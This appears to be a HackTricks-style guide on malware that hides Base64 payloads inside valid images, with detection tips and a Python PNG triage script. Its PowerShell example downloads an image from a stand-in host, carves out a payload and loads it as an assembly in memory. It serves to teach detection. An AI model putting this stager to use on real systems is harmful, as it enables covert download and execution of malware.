Malware & Network Stego
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Not all steganography is pixel LSB; commodity malware often hides payloads inside files that are otherwise perfectly valid.
Practical patterns
Marker-delimited payloads in valid images
If a script downloads an image and immediately parses it as text/Base64, the payload is usually marker-delimited rather than hidden in pixel data.
Commodity loaders now commonly stash Base64 payloads as plain text inside otherwise-valid images (often GIF/PNG). Instead of pixel-level LSB, the payload is bracketed by unique marker strings placed in the file's text/metadata, so the image still renders and the carving logic is trivial. The stager then:
- Downloads the image over HTTP(S)
- Locates the start/end markers
- Takes the text between them and Base64-decodes it
- Loads/executes the result in memory
Minimal PowerShell carving snippet:
```powershell
# Fetch the "image" as a string: the markers and payload are plain ASCII inside it
$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
# Unique start/end markers delimit the Base64 blob
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
    # Carve the text between the markers and decode it to raw bytes
    $b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
    $bytes = [Convert]::FromBase64String($b64)
    # Load the decoded .NET assembly straight from memory (nothing touches disk)
    [Reflection.Assembly]::Load($bytes) | Out-Null
}
```
Notes:
- ATT&CK: T1027.003 (Steganography)
- Detection/hunting:
- Scan downloaded images for delimiter strings and for long runs of Base64 text.
- Flag scripts that download images and immediately call Base64 decoding routines (PowerShell FromBase64String, JS atob, etc.).
- Look for HTTP content-type mismatches (an image/* response whose body is mostly ASCII or contains long Base64 runs).
Other high-signal places to hide payloads
These are usually much faster to check than content-level pixel stego:
- Metadata: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt chunks, JPEG COM/APPn segments.
- Trailing bytes: data appended after the format's official end marker (for example, after the PNG IEND chunk). Most image parsers stop at the end marker, so anything after it is ignored by the viewer but still available to the loader.
- Embedded archives: a ZIP/7z embedded in or appended to the file and later extracted by the loader.
- Polyglots: files crafted to be valid for several parsers at once (for example, image + script + archive).
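The following Python is an added example (not code from the original page or from the Unit 42 report) that turns the hunting bullets above and the list of hiding places into one triage pass over a PNG: it walks the chunk list and verifies CRCs, decodes tEXt/zTXt/iTXt text, measures how many bytes trail the IEND chunk, scans for long Base64 runs, computes the printable-ASCII ratio that the content-type mismatch check relies on, and carves between the same markers the PowerShell stager uses. The marker strings, the 1x1 sample PNG and the "MZ" stand-in payload are all constructed here for illustration and are not taken from a real sample.

```python
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# 64+ consecutive Base64-alphabet characters are rare in compressed pixel data
# but are exactly what a text-stashed payload looks like.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def png_chunk(ctype, body):
    """Serialise one PNG chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def parse_png_chunks(data):
    """Walk the chunk list up to IEND. Returns (chunks, offset_after_IEND, bad_crc_types)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks, bad_crcs = len(PNG_SIG), [], []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            break  # truncated chunk: stop here and treat the rest as trailing data
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:end])[0]
        if crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            bad_crcs.append(ctype.decode("latin-1"))  # tampered/hand-built chunk
        chunks.append((ctype.decode("latin-1"), body))
        pos = end
        if ctype == b"IEND":
            break
    return chunks, pos, bad_crcs


def text_chunks(chunks):
    """Decode tEXt/zTXt/iTXt chunks to (type, keyword, text_bytes)."""
    out = []
    for ctype, body in chunks:
        if ctype not in ("tEXt", "zTXt", "iTXt"):
            continue
        key, _, rest = body.partition(b"\x00")
        if ctype == "tEXt":
            text = rest
        elif ctype == "zTXt":
            text = zlib.decompress(rest[1:])  # rest[0] is the compression method
        else:  # iTXt: comp flag, comp method, language\0, translated keyword\0, text
            comp_flag, rest = rest[0], rest[2:]
            _lang, _, rest = rest.partition(b"\x00")
            _translated, _, text = rest.partition(b"\x00")
            if comp_flag:
                text = zlib.decompress(text)
        out.append((ctype, key.decode("latin-1"), text))
    return out


def carve_between_markers(data, start, end):
    """Mirror the stager: bytes between the first start marker and the next end marker."""
    s = data.find(start)
    if s < 0:
        return None
    s += len(start)
    e = data.find(end, s)
    return data[s:e] if e >= 0 else None


def ascii_ratio(data):
    """Fraction of printable-ASCII bytes; an image/* body near 1.0 is suspicious."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def triage_png(data, markers=(b"<<sudo_png>>", b"<<sudo_odt>>")):
    """Collect the cheap indicators from the page in one pass. Markers are assumed."""
    chunks, end_off, bad_crcs = parse_png_chunks(data)
    carved = carve_between_markers(data, *markers)
    payload = None
    if carved is not None:
        try:
            payload = base64.b64decode(carved, validate=True)
        except ValueError:
            payload = None  # markers present but the middle is not clean Base64
    return {
        "trailing_bytes": len(data) - end_off,
        "bad_crcs": bad_crcs,
        "text_chunks": [(t, k, len(v)) for t, k, v in text_chunks(chunks)],
        "b64_runs": [m.group(0) for m in B64_RUN.finditer(data)],
        "ascii_ratio": ascii_ratio(data),
        "carved_payload": payload,
    }


def build_sample():
    """Constructed 1x1 PNG with Base64 in a tEXt chunk and a marker-delimited
    payload appended after IEND. Not a real malware sample."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")             # filter byte + one pixel
    comment = b"Comment\x00" + base64.b64encode(b"stage2 from tEXt")
    png = (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat)
           + png_chunk(b"tEXt", comment) + png_chunk(b"IEND", b""))
    fake_stage = b"MZ" + b"\x90" * 70                      # stand-in for a PE, not real
    return png + b"<<sudo_png>>" + base64.b64encode(fake_stage) + b"<<sudo_odt>>"


if __name__ == "__main__":
    for key, value in triage_png(build_sample()).items():
        print(f"{key}: {value!r}")
```

On a real sample you would feed the raw response body (not a text-decoded string) to triage_png and treat any of non-zero trailing_bytes, a CRC mismatch, a long Base64 run, or a high ascii_ratio on an image/* response as a reason to carve and detonate the result in a sandbox.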
Triage commands
```bash
file sample                       # real type vs. claimed extension / content-type
exiftool -a -u -g1 sample         # dump all metadata, including unknown tags, grouped
strings -n 8 sample | head        # long printable runs (markers, Base64, URLs)
binwalk sample                    # embedded signatures (archives, trailing data)
binwalk -e sample                 # extract anything it found
```
References:
- Unit 42 example: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
- MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
- File-format polyglots and container tricks: https://github.com/corkami/docs
- Aperi'Solve (online stego triage): https://aperisolve.com/